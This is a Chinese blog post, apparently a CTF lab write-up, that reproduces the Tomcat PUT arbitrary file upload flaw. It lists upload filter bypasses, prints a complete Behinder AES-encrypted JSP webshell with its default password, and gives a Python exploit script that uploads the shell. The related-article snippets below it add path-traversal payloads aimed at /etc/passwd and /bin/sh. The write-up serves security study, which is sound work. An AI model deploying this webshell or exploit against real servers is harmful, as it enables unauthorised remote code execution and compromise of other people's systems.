[web攻防]Tomcat 任意文件上传漏洞 安鸾靶场复现

已于 2022-02-07 23:07:27 修改
阅读量2.6k 收藏
点赞数
分类专栏: CTF -WEB 学习 web攻防学习 文章标签: tomcat 前端 java
于 2022-02-07 23:07:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AAAAAAAAAAAA66/article/details/122815891
版权
本文详细介绍了Apache Tomcat的任意文件上传漏洞,包括漏洞成因、复现过程和两种利用方法。当Tomcat在Windows上运行并启用HTTP PUT请求时,攻击者可上传包含任意代码的JSP文件,执行服务器上的代码。文章提供了手动上传和Python脚本利用的步骤,并给出了相关参考链接。
摘要由CSDN通过智能技术生成

中华人民共和国网络安全法(出版物)_360百科

目录

漏洞成因

 复现过程

 方法一 手动上传

 方法二 (只需python 环境 不需要其他工具)

漏洞成因

当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。
影响范围:Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)


 这里还有一个细节

其实tomcat会对上传的文件内容进行限制,比如说禁止上传 .jpg 后缀的文件,只不过,这个过滤机制可以通过一些windows 或着 linux的特性绕过。

  • Windows下不允许文件以空格结尾

    以PUT /x.jsp%20 HTTP/1.1上传到windows会被自动去掉末尾空格

  • WindowsNTFS流

    PUT /x.jsp::$DATA HTTP/1.1

  • /在文件名中是非法的,也会被去除(Linux/Windows)

    PUT /x.jsp/ HTTP/1.1

本次使用的是第三种方法绕过

 复现过程

靶场地址

Apache Tomcat/8.5.19

 方法一 手动上传

在首页刷新 抓包 改为如下形式

发包后返回201 这时直接访问 木马存在(直接在网站根目录 xxxx/1.jsp)

 自带马 密码为默认rebeyond

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

 连接

终端 输入查找语句

find -name *flag*

 

 方法二 (只需python 环境 不需要其他工具)

其实漏洞利用的原理都一样,这个适合那些没有工具的哥们,比如有的蚁剑没有连接jsp马的选项。。。。 如果要下冰蝎的话,只能连接它的自带马。

python 脚本

    conn = httplib.HTTPConnection(sys.argv[1])
    conn.request(method='OPTIONS', url='/ffffzz')
    headers = dict(conn.getresponse().getheaders())
    if 'allow' in headers and headers['allow'].find('PUT') > 0 :
        conn.close()
        conn = httplib.HTTPConnection(sys.argv[1])
        url = "/" + str(int(time.time()))+'.jsp/'
        #url = "/" + str(int(time.time()))+'.jsp::$DATA'
        conn.request( method='PUT', url= url, body=body)
        res = conn.getresponse()
        if res.status  == 201 :
            #print 'shell:', 'http://' + sys.argv[1] + url[:-7]
            print 'shell:', 'http://' + sys.argv[1] + url[:-1]
        elif res.status == 204 :
            print 'file exists'
        else:
            print 'error'
        conn.close()
    else:
        print 'Server not vulnerable'

except Exception,e:
    print 'Error:', e
"~/桌面/tomcat.py" 33L, 1603B                                 33,21        底端

 慢慢传参命令执行

 

参考链接

https://blog.csdn.net/qq115399231/article/details/97371795

https://blog.csdn.net/weixin_40412037/article/details/10625557

https://zhishihezi.net/c/c7ecf406d93ed094559f1cd654950609
Tomcat任意文件写入漏洞 - Xor0ne - 博客园

作者水平有限,有任何不当之处欢迎指正。

本文目的是为了传播web安全原理知识,提高相关人员的安全意识,任何利用本文提到的技术与工具造成的违法行为,后果自负! 

AAAAAAAAAAAA66
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
复现文件上传漏洞(1-23)靶场练习
weixin_45701675的博客
11-20 1099
文件上传漏洞
文件上传漏洞--upload-labs靶场复现(前3关)
pakho_C的博客
01-28 430
靶场下载链接 第一关 源码: function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!"); return false; } //定义允许上传的文件类型 var allow_ext = ".jpg|.png|.gif";
中间件安全—Tomcat常见漏洞
最新发布
qq_53058639的博客
07-08 1006
链接。
CVE-2017-12615 Tomcat任意文件上传漏洞详解
永远是少年
10-02 1938
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2017-12615 Tomcat任意文件上传漏洞详解。 一、漏洞简介 二、Vulhub漏洞环境启动 三、漏洞实战
Tomcat漏洞
WEILIN19921214的专栏
07-05 5324
tomcat是一个开源Web服务器,基于TomcatWeb运行效率高,可以在一般的硬件平台上流畅运行,因此,颇受Web站长的青睐。不过,在默认配置下其存在一定的安全隐患,可被恶意攻击。 另外,由于其功能比较单纯需要我们进一步地进行设置。本机将从安全和功能两方面谈谈基于TomcatWeb服务器的部署,希望对大家有所帮助。    环境描述   OS:Windows S
Tomcat任意文件上传(CVE-2017-12615)漏洞复现(附POC)
byt8563的博客
06-30 3941
欢迎使用Markdown编辑器 • 漏洞名称:Tomcat任意文件上传漏洞漏洞编号:CVE-2017-12615 • 漏洞影响:上传包含任意代码的文件,并被服务器执行。 • 影响平台:Windows • 影响版本:Apache Tomcat 7.0.0 - 7.0.81 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,
服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现
ran的博客
05-13 2734
ISS中间件(Internet Security and Acceleration Server Middleware)是微软公司推出的一种安全中间件,旨在提供高效的安全代理服务和网络加速功能。它是Microsoft Proxy Server和Microsoft Firewall产品的继承者,也是Microsoft Forefront TMG(Threat Management Gateway)的前身。
【网络安全---漏洞复现Tomcat CVE-2024-1938 漏洞复现和利用过程(特详细)
2401_83946826的博客
04-16 1580
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
Apache Tomcat(CVE-2019-0232)远程代码执行漏洞复现
m0_48520508的博客
01-28 1709
0x00简介 Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。对于一个初学者来说,可以这样认为,当在一台机器上配置好Apache 服务器,可利用它响应HTML(标准通用标记语言下的一个应用)页面的访问请求。实际上Tomcat是Apache 服务器的扩展,但运行时它是独立运行的,所以当你运行tomcat 时,它实际上作为一个与Apache 独立的进程单独运行的。 0x01漏洞概述 该漏
中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx
xiaoheizi的博客
07-13 310
将访问路径更改为:/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd 因为是Unix系统,所以敏感信息在/etc/passwd下,放包成功获取数据。将访问路径更改为:/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh。点击测试链接,如果测试成功就点击添加。打开vulfocus靶场,启动漏洞环境,打开漏洞地址。打开vulfocus靶场,启动漏洞环境,打开漏洞地址。
逻辑漏洞渗透与攻防(一)身份验证漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-03 1267
逻辑漏洞就是基于开发人员设计程序的时候,逻辑不严密,导致攻击者可以修改、绕过或者中断整个程序,让程序按照开发人员的预料之外去执行。比如某一网页的登录验证逻辑如下:输入用户名验证--验证成功后输入密码--输入验证码--数据包前端传到后端处理--数据库匹配--匹配成功回包 由于整体网站可能采用前端验证,黑客可以直接篡改或者绕过某些流程,如下:BP抓取用户名,密码、验证码特定格式--发送给后端匹配,由于网站采用前端验证,导致攻击者可以直接抓取数据包,从而绕过用户名验证的过程,直接爆破,简单来讲,只要你能修改、绕过
Tomcat任意文件上传漏洞(CVE-2017-12615)
qq_58000413的博客
09-15 1101
访问222.jsp页面发现有内容(这里是Hello java的原因是我自己已经上传过一次,由于已经实操过一遍不想再次上传所以就用了第一次实操的222.jsp文件,还请见谅)验证成功,则当我们上传的内容是jsp的一句话那么我们就可以拿下这台服务器,这里由于是自己购买的服务器就不上传一句话木马了。总体来说这个漏洞复现起来还是比较简单的。Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,其中 远程代码执行漏洞(CVE-2017-12615)
Tomcat PUT的上传漏洞(CVE-2017-12615)
weixin_47417079的博客
08-21 417
Tomcat PUT的上传漏洞(CVE-2017-12615)
tomcat漏洞任意文件上传(CVE-2017-12615)
weixin_53711701的博客
12-24 3119
tomcat漏洞任意文件上传(CVE-2017-12615)
tomcat中间件漏洞复现
mingyqf的博客
02-14 3963
Apache Tomcat文件包含漏洞CVE-2020-1938 一、漏洞描述 Tomcat是Apache开源组织开发的用于处理HTTP服务的项目,两者都是免费的,都可以做为独立的Web服务器运行。Apache Tomcat服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件或源代码等。 二、漏洞危害等级 高 三、影响版本 Apache Tomcat 6 Tomcat 7系列 <7.0.100 To
Vulfocus之tomcat系列题目获取flag攻略
weixin_45130489的博客
09-19 2105
快速通关靶场,3个tomcat漏洞的题目。
tomcat 7 任意文件上传漏洞(信息搜集与漏洞探测)
m0_67391377的博客
08-25 1032
(6)抓包发现存在404报错,一个get方法,以及tomcat版本。(7)上网查tomcat漏洞,在7版本的时候存在以下漏洞。1)使用nmap -sP扫描c段网络存活主机。通过对页面浏览,得知该网站存在一个信息泄露。2)使用nmap -sS扫描端口开放。(1)查询攻击机kali的IP地址。(4)在kali中进行服务扫描验证。(5)使用nmap -O 查看系统。(2)识别存活主机,发现攻击目标。(8)对网站进行修改put测试。(10)再上传jsp一句话木马。(3)在浏览器中打开该ip。(9)访问上传的文件。
Web中间件漏洞Tomcat
d59hao的博客
05-26 1415
Tomcat 服务器是一个免费的开放源代码的 Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试 JSP 程序的首选。对于一个初学者来说,可以这样认为,当在一台机器上配置好 Apache 服务器,可利用它响应 HTML(标准通用标记语言下的一个应用)页面的访问请求。实际上 Tomcat 是 Apache 服务器的扩展,但运行时它是独立运行的,所以当运行 tomcat 时,它实际上作为一个与 Apache 独立的进程单独运行的。
Tomcat NIO(16)-文件上传
weixin_46073333的博客
12-05 189
在上一篇文章中我们主要介绍了 tomcat nio 中的长连接,包括长连接开启和关闭的条件,每个长连接可以复用的请求数目等等,在这里我们介绍 tomcat文件上传的支持。对于 htt...
Tomcat 爆出高危漏洞
macrozheng的专栏
03-03 1782
转载自:www.anquanke.com/post/id/199448一、漏洞背景 安全公告编号:CNTA-2020-00042020年02月20日, 360CERT 监测发现 国家信息...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值